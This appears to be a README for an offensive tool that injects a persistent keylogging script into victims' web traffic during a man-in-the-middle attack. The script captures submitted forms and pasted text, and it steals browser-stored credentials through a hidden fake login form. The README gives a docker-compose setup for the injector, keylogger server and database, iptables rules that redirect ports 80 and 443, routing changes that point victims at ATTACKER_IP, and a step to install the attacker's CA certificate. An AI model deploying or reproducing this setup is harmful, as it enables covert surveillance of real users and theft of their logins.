Tool for injecting monitoring script into the HTTP/S traffic during MITM attack. The script is capable of monitoring selected user's activities (submiting forms and pasting text) and extraction of user's stored credentials. Upon initial injection to the web page (origin), script is able to persist itself inside a browser and operate even after the MITM attack has completed up until user clears his/her browser.
mitmproxy is an interactive, SSL/TLS-capable intercepting proxy with a console interface for HTTP/1, HTTP/2, and WebSockets.
- Web-service logging data from the Hook and visualizing them
- Intercepts:
- data submitted to forms,
- pasted text into webpage
- Extracts user's credential by faking login form --- if credentials are stored for the domain, browser (Chrome, Firefox) inserts them into the hidden fake login form
version: '3.5'
services:
injector:
image: injector
container_name: injector
build:
context: ./injector
volumes:
- ./data/mitmproxy:/root/.mitmproxy
ports:
- 8080:8080
environment:
- HOOK_HOST=$HOOK_HOST
- HOOK_PORT_HTTP=$HOOK_PORT_HTTP
- HOOK_PORT_HTTPS=$HOOK_PORT_HTTPS
network_mode: host
keylogger:
image: nesatfit/keylogger:latest
build:
context: ./keyloggerServer
container_name: keylogger
command: --db=mongo --hook_host=$HOOK_HOST --hook_port_http $HOOK_PORT_HTTP --hook_port_https $HOOK_PORT_HTTPS
ports:
- 8081:80
- 8445:443
- 7000:7000
restart: unless-stopped
volumes:
- ./data/mitmproxy:/data/mitmproxy
- ./data/haproxy:/data/haproxy
depends_on:
- injector
- mongo
environment:
- HOOK_HOST=$HOOK_HOST
mongo:
container_name: keylogger_mongo
image: mongo
restart: unless-stopped
volumes:
- ./data/mongo:/data/db
# Modify .env and docker-compose.yml variables to reflect your environment
docker-compose up -d
# Setup firewall rules
sysctl -w net.ipv4.ip_forward=1
sysctl -w net.ipv4.conf.all.send_redirects=0
iptables -P FORWARD ACCEPT
iptables -t nat -N MITM
iptables -t nat -A MITM -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A MITM -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
# Enable
iptables -t nat -A PREROUTING -j MITM
# Disable
iptables -t nat -D PREROUTING -j MITM
# Simulate MITM by setting a default gateway to attackers IP
ip route del to default via ORIGINAL_DEFAULT_GATEWAY_IP
ip route add default via ATTACKER_IP
Visit mitm.it in client browser and install CA certificate